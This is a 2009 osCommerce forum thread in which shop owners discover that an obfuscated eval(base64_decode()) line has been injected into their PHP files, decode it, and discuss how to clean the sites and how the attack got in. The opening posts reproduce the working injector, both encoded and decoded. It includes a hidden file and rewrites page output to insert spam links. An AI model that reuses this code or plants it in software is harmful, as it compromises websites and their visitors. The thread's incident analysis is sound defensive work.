154 replies to this topic

[Weedwaka]

I was doing some updating on my site and I notices some strange code appearing in all of my php files at the top .

What is this ? I sure as hell did not put it there ? Should I erase it all ?

Can I tell when it was added ?

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p
KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS91c2Vycy93ZWIvYjk2OS9pc
HcuYWN0aXZlL3B1YmxpY19odG1sL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdlcy
9idXR0b25zL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS91c2Vycy93ZWIvYjk2OS9
pcHcuYWN0aXZlL3B1YmxpY19odG1sL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdl
cy9idXR0b25zL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb
25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbi
BnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzM
wODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjcz
Mjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBM
jA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEOD
ZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFI
yMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNG
QzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDR
DFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMz
kzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3Qjd
BN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4
LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENER
ThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RT
QxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0Q
xQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5
N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxM
EVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQU
RDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTV
CNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRE
NzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBN
UI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1ME
FFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzN
FMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMy
RjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2Q
zczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJy
QxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21
sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319
fQ==')); ?>

[germ]

click this

[germ]

I decoded it and it tells you where one of the hackers files are:

Quote

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/users/web/b969/ipw.active/public_html/admin/includes/languages/english/images/buttons/style.css.php')){include_once('/home/users/web/b969/ipw.active/public_html/admin/includes/languages/english/images/buttons/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

[FIMBLE]

I found a very similar script in admin / fckeditor / editor / filemanager / browser / default / images / icons / 32 / sytle.css.php
in someones site last week, another good reason why people need to increase security, at the very least change the admin folder name.

[Weedwaka]

Thanks for the reply's

You were correct on the file being on the hackers. I deleted it and cleaned the other files however now I am having some problems.

I cant log into my admin at all . Nothing comes up.

I am getting the old permissions warning on the includes/configure.php file which is set to 444 and I cant figure out why. Aaarg !!!

Why are people such douche bags ??

Any help with these problems would be greatly appreciated .

[FIMBLE]

This kind of hack usually writes to EVERY php file on your account, you will need to make sure that they all are clean.
I expect that your host has error reporting off, so you will need to view your server error logs or read this article
click me to get the code to add

[Weedwaka]

If anybody wants the information from that file, I can email it. It is too long to post.

[blueflametuna]

Yup, me too!  Same identical signature.

Almost every php file within the osCommerce hierarchy.  /admin, /catalog.

All with the same time stamp of Sep 04 2009 07:36 PST.
This is an automated hack.  It finds you, embeds itself, and spreads itself around.

This appears very similar to one I saw last year.

I contacted my hosting provider, and they said there was nothing they could or would do.
"Try osCommerce.  It's their code vulnerabilities.  Fix the scripts."

This is one of the reasons I went through the trouble of moving to a new hosting service,
and upgrading to the v2.2 RC2a.
The previous version had some security issues.

Apparently, so does this one.
I am about done with trying to clean up my site on a weekly basis.
Only to have this garbage re-infecting my site again and again.

[Weedwaka]

What is the purpose of this code ?

[blueflametuna]

I haven't followed all of the logic in this one, but if it is similar to the hack from last year,
it embeds the eval stuff at the front of every php file.  Which then runs more scripts that have been burried
deeper within your file system.

I found these in /admin/includes/languages/english/modules/index

cnf
csi
customers.php
dg.php
lock
orders.php
s.php
skwd
style.css.php
style.css.php.orig
swf

Only two of which are my original files: customers.php and orders.php.

cnf:                ASCII text
csi:                ASCII text
dg.php:             PHP script text
lock:               empty
s.php:              PHP script text
skwd:               ASCII text, with CRLF line terminators
style.css.php:      PHP script text
style.css.php.orig: PHP script text
swf:                Macromedia Flash data (compressed), version 9

csi has an IP address and a UNIX time stamp.
The IP address resolves to some tpnet.pl, a dialup service in Warsaw, Poland.

The file skwd is a list of random search words:

tramadol
blackjack
craps
onlinecasino
propecia
pokerstars
fulltiltpoker
gambling
casino
casinos
alprazolam
soma
ambien
cialis
ultram
viagra
fioricet
xanax
fiericet
slot
baccarat
carisoprodol
keno
muscle
valium
deposit
deposits
levitra
zoloft
acomplia
acyclovir
betting
realtytrac
intercasino
zithromax
diazepam
sildenafil
tadalafil
valtrex

No doubt to be used by Google and other search engines to be linked back to your site,
at locations that have nothing to do with your ecommerce content.

Last time, it was some porno sites in China and Russia.

And visitors to your site will now be the happy beneficiaries of virii.
I received threats from people saying that I was a porno spammer.  Sheesh.


But this variation isd much more sophisticated.
The prior version was not nearly as prolific, or buried as deep.

I am still faced with the prospect of re-uploading my entire site contents,
and resetting all of the directory and file permissions.  Hours and hours.

And without some reassurance that the vulnerabilities will be fixed in the next six months,
I am forced to make the decision to either check the site daily, or to find a new ecommerce solution.

[Tbench]

It got me as well on two sites.

Siteground want $50 to fix it or $150 for a 99.9% solution.

What I cannot fathom is what they get out of it!!

[blueflametuna]

The hackers get tons of traffic sent to their sites via your server.
It is virtually untraceable.  And self replicating.  This thing could have been sent out months ago.
As it finds more sites that support php (osCommerce, specifically), it knows precise vulnerabilities.

It is our job to figure out how, and to block yet another hole.

But don't expect your service provider's tech support to offer you anything more than README files,
and a more expensive solution.

That's exactly what I want to do with my next two weeks: Start all over again with yet another eCommerce package,
customizing the cosmetics, developing a new database of products, and finding another hosting company.  Oh joy.

[Giovanna]

Why do all that when you can follow the instructions on how to secure your site in the tips and tricks section. Your host cannot help if you dont make sure your installation is not protected.
Main thing is to rename your admin and protect it via your host panel. Read the tips and tricks sectio it is full of information on how to protect yourself and your customers.

[Giovanna]

http://forums.oscommerce.com/index.php?showtopic=313323
The direct link to the secure your site info.

[germ]

blueflametuna, on Sep 7 2009, 01:46 PM, said:

Yup, me too!  Same identical signature.

Almost every php file within the osCommerce hierarchy.  /admin, /catalog.

All with the same time stamp of Sep 04 2009 07:36 PST.
This is an automated hack.  It finds you, embeds itself, and spreads itself around.

This appears very similar to one I saw last year.

I contacted my hosting provider, and they said there was nothing they could or would do.
"Try osCommerce.  It's their code vulnerabilities.  Fix the scripts."

This is one of the reasons I went through the trouble of moving to a new hosting service,
and upgrading to the v2.2 RC2a.
The previous version had some security issues.

Apparently, so does this one.
I am about done with trying to clean up my site on a weekly basis.
Only to have this garbage re-infecting my site again and again.

I'd have to disagree.

It's been my observation that more often than not it's usually because of the way the site is setup and NOT the software behind it.

The site I manage isn't even running the latest V2 of osC and in the 2+ years we've been on the net we've only had two minor "bumps in the road".

My observation has been that over 90% of the sites that get hacked are because they have a folder (/images or /catalog/images or /admin/backups usually) set with 777 permissions.

It is an undeniable truth that if you have a FOLDER with 777 permissions, because of the way most servers are set up, it's usually only matter of time before you get hacked.

Not IF, just WHEN and HOW BAD.

Folder permissions should NEVER be higher tha 755 - EVER.

These hackers can even get behind the .htaccess file "protecting" the admin if there is a folder back there with 777 permissions. I've seen it happen.

Edited by germ, 07 September 2009 - 11:19 PM.

[blueflametuna]

Thank you for your observation.  But there are no folders or files with permissions higher thn 755.  Most are 644.
There are absolutely no files or folders now, or in the past that were ever set to 777.  This was the first thing I checked then,
and is something I have just verified again now.

Yours is an easy and obvious suggestion, but not valid in this case.  The files are owned by my account, and the server runs with my ownership permissions.  The software is permitting the server to overwrite my own files in place, then executing them.  It does not need "other" write permissions if it can run as the "owner".

I submit that there ARE vulnerabilities in the code, and that even with "best practices" and a secure server,
these hackers are able to circumvent this and do their evil.

They are not logging in, they are not using FTP.  These are self-midifying scripting tactics, through some form of an input validation bypass, or form processing technique.

[germ]

Then you are among the minority.

Security is only as strong as the weakest link.

There are a lot of relatively new FTP viruses than can infect your PC, and thru that gain access to your site.

If your PC is compromised (and post people can't tell) then your site may be as well.

And just because you have an up-to-date antivirus running doesn't necessarily mean your PC is "clean".

I used to do a lot of help/posting on an anti-virus/anti malware removal site.

Most everyone that had a virus I saw also had an up-to-date antivirus running. I never could figure that one out.

There are a few contributions that have known security issues that I have seen.

And there might be unknown flaws in the base code.

I'm not saying it's immune. I really don't know.

My experience is that it's the inexperience of most site owners/operators that leads to problems like this more times than not.

[blueflametuna]

Like I said, they did not login, and they did not use FTP to "upload" new files.
The files were edited in place by prepending the one line <?php eval(base64_decode ... to nearly 1,000 files at once.

This has nothing to do with a virus on my PC.

It has only to do with a vulnerability within the osCommerce software that they are able to take advantage of.

In the previous version, they used global variables.  I upgraded to rc2a so that it would no longer use them.
Now there is something new, but I suspect, very similar in its design.

Unfortunately, I do not have archives of the access logs, so I cannot prove it, nor enough real-time data to pursue a forensics investigation.

I am not a newbie.  (Or is it NOOB these days?)  I do not even attempt to keep up with the current vernacular,
or local colloquialisms of new age netiquette.   But I can still find my way around a keyboard, and navigate through
thousands of lines of code, if need be.  It is just frustrating that I should need to.  It's a shopping cart app.

[germ]

And until you have access to the server logs, and can prove someone was in a particular osC file with a particular URL and did such-and-such (SQL injection or whatever), the real cause is still unkown.

Any "finger pointing" at this point in time is mere conjecture.

I've only had two minor "blurps" in two and a half years, and they were my fault.

It seems to work for the site I manage so I'm staying.

[Weedwaka]

I am very much a newbie at php. I probably did leave a door open somewhere for this weenie to get in.

I am still trying to get my site back up and running because of this crap =/